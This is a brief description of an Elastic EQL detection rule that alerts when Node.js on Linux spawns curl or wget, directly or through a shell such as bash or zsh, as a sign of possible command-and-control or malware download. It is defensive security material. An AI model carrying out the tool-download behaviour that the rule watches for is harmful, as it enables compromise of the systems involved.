This detection rule is designed to identify instances where Node.js spawns the curl or wget commands either directly or via a shell, which may indicate potential command and control (C2) activities. Adversaries may exploit Node.js to download additional malware or tools onto a compromised system. The rule uses Elastic Query Language (EQL) to analyze process events on Linux environments, specifically looking for process creation events where the parent process is Node.js. The detection logic checks for various shell interpreters (like bash or zsh) executing commands that include curl or wget, as well as direct executions of those commands. If such behavior is detected within the defined time frame, the rule triggers an alert with a low risk score of 21, indicating a potential security incident that may warrant further investigation. To implement this rule, Elastic Defend must be properly set up in conjunction with the Elastic Agent. The integration allows for the monitoring of process-related events, necessary for effective detection.